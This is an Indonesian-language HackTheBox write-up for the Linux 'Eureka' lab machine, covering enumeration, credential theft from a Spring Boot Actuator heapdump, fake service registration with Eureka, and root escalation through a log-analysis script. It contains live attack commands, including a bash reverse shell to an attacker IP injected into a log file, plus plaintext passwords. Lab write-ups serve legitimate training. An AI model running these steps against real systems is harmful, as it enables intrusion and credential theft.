Writeup HTB Eureka (Linux – Hard) | Panduan Lengkap HackTheBox
Writeup Htb Eureka
Writeup HTB Eureka

Daftar Isi

Writeup HTB Eureka ini membahas mesin Eureka dari platform HackTheBox yang berjalan di sistem operasi Linux dengan tingkat kesulitan Hard.

Informasi Umum Machine

  • Nama: Eureka
  • Platform: HackTheBox
  • IP: 10.10.11.66
  • OS: Linux
  • Tingkat Kesulitan: Hard
  • Kategori: Web Exploitation, Misconfiguration, Privilege Escalation

Enumeration

Pada tahap awal enumeration untuk HackTheBox Eureka, kita fokus pada scanning port dan eksplorasi HTTP menggunakan nmap dan dirsearch.

Nmap Scan

nmap -sCV -p- -T4 10.10.11.66 -oA eureka_fullscan

Hasil menunjukkan port 22 (SSH) dan 80 (HTTP) terbuka.

/etc/hosts

10.10.11.66 eureka.htb furni.htb

Dirsearch / Gobuster

dirsearch -u http://furni.htb -e php,html,txt -t 50

Menemukan endpoint penting: /actuator, /actuator/env, dan /actuator/heapdump

Eksploitasi

Eksploitasi pada HTB Linux Hard seperti Eureka ini menunjukkan pentingnya memahami celah dari konfigurasi default Spring Boot Actuator.

1. Download Heap Dump

Heapdump dapat diakses via:

http://furni.htb/actuator/heapdump

2. Analisis Heap Dump

Gunakan perintah:

strings heapdump.hprof | grep -Ei 'password|secret|token'

Hasil:

{password=0sc@r190_S0l!dP@sswd, user=oscar190}

3. SSH sebagai Oscar

ssh oscar190@furni.htb
Password: 0sc@r190_S0l!dP@sswd

4. Cari file konfigurasi

cat /var/www/web/Eureka-Server/target/classes/application.yaml

Hasil:

username: EurekaSrvr
password: 0scarPWDisTheB3st

5. Register Service Palsu ke Eureka

curl -X POST http://EurekaSrvr:0scarPWDisTheB3st@furni.htb:8761/eureka/apps/USER-MANAGEMENT-SERVICE -H 'Content-Type: application/json' -d '{...}'

6. Jalankan Listener

nc -nlvp 8081

Dapatkan kredensial:

Username: miranda.wise@furni.htb
Password: IL!veT0Be&BeT0L0ve

7. SSH sebagai Miranda

ssh miranda.wise@furni.htb

Privilege Escalation

1. Cek proses milik root

ps -ef | grep log_analyse.sh

2. Temukan file script

find / -name log_analyse.sh

Hasil: /opt/log_analyse.sh

3. Payload Reverse Shell


rm /var/www/web/user-management-service/log/application.log
echo 'HTTP Status: x[$(/bin/bash -i >& /dev/tcp/10.10.14.149/1337 0>&1)]' > /var/www/web/user-management-service/log/application.log

4. Listener

nc -nlvp 1337

Setelah beberapa saat, shell root masuk.

Root Flag

cat /root/root.txt

βœ… Root Flag berhasil diperoleh.

Kesimpulan

Dengan mengikuti writeup HTB Eureka ini, diharapkan pembaca bisa memahami pendekatan teknis untuk menyelesaikan machine tingkat lanjut di HackTheBox, khususnya kategori HTB Linux Hard.

Machine Eureka dari HackTheBox menguji kemampuan dalam melakukan enumeration tingkat lanjut, eksploitasi konfigurasi Spring Boot Actuator, serta privilege escalation melalui log analyzer script.

Jika Anda mencari tantangan kompleks di HTB kategori Linux, Eureka sangat direkomendasikan untuk mengasah keterampilan real-world exploitation.